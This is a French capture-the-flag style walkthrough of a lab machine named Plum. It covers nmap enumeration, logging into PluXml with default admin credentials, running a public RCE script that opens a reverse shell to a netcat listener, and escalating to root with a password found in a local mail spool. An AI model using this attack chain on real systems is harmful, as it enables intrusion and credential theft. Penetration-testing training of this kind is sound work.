# Plum

`pluXML` `exim` `smtp` `mail`

* Nom machine : Plum
* Difficulté : Intermédiaire
* OS : Linux

## Enumération

### NMAP

```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-27 10:57 EDT
Nmap scan report for 192.168.208.28
Host is up (0.038s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 c9:c3:da:15:28:3b:f1:f8:9a:36:df:4d:36:6b:a7:44 (RSA)
|   256 26:03:2b:f6:da:90:1d:1b:ec:8d:8f:8d:1e:7e:3d:6b (ECDSA)
|_  256 fb:43:b2:b0:19:2f:d3:f6:bc:aa:60:67:ab:c1:af:37 (ED25519)
80/tcp open  http    Apache httpd 2.4.56 ((Debian))
|_http-title: PluXml - Blog or CMS, XML powered !
|_http-server-header: Apache/2.4.56 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

### HTTP (80)

Le site utilise le CMS PluXml. En bas de page, un lien qui mène vers une page pour s'authentifier en tant qu'admin. admin:admin fonctionne.

Nous trouvons le numéro de version sur la page.

## Accès initial

{% embed url="<https://github.com/erlaplante/pluxml-rce>" %}

```
┌──(kali㉿kali)-[~/oscp]
└─$ python script.py http://192.168.208.28 admin admin 192.168.45.224 1234 
[+] Attempting login...
[+] Successfully logged in as: admin
[+] Attempting to modify template...
[+] Attemtping to save template...
[+] Check your listener...
```

```
┌──(kali㉿kali)-[~/oscp]
└─$ nc -lnvp 1234                    
listening on [any] 1234 ...
connect to [192.168.45.224] from (UNKNOWN) [192.168.208.28] 50906
bash: cannot set terminal process group (720): Inappropriate ioctl for device
bash: no job control in this shell
www-data@plum:/var/www/html$ whoami
whoami
www-data
```

## Elévation des privilèges

```
www-data@plum:/var/www$ netstat -ant
netstat -ant
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State      
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN     
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN     
tcp        0     13 192.168.208.28:47238    192.168.45.224:1234     ESTABLISHED
tcp6       0      0 :::22                   :::*                    LISTEN     
tcp6       0      0 ::1:25                  :::*                    LISTEN     
tcp6       0      0 :::80                   :::*                    LISTEN     
tcp6       0      0 192.168.208.28:80       192.168.45.224:49078    ESTABLISHED
```

Le port 25 est ouvert et nous avons vu qu'exim tourne sur la machine.

Nous allons voir le contenu des mails. Ils peuvent se trouvans :

* /var/spool/exim4/
* /var/log/exim4/
* /var/mail/
* /var/spool/mail/

```
www-data@plum:/var/www/html$ cat /var/mail/www-data
cat /var/mail/www-data
From root@localhost Fri Aug 25 06:31:47 2023
Return-path: <root@localhost>
Envelope-to: www-data@localhost
Delivery-date: Fri, 25 Aug 2023 06:31:47 -0400
Received: from root by localhost with local (Exim 4.94.2)
	(envelope-from <root@localhost>)
	id 1qZU6V-0000El-Pw
	for www-data@localhost; Fri, 25 Aug 2023 06:31:47 -0400
To: www-data@localhost
From: root@localhost
Subject: URGENT - DDOS ATTACK"
Reply-to: root@localhost
Message-Id: <E1qZU6V-0000El-Pw@localhost>
Date: Fri, 25 Aug 2023 06:31:47 -0400

We are under attack. We've been targeted by an extremely complicated and sophisicated DDOS attack. I trust your skills. Please save us from this. Here are the credentials for the root user:  
root:6s8kaZZNaZZYBMfh2YEW
Thanks,
Administrator
```

```
www-data@plum:/var/www/html$ su root
su root
Password: 6s8kaZZNaZZYBMfh2YEW
whoami
root
```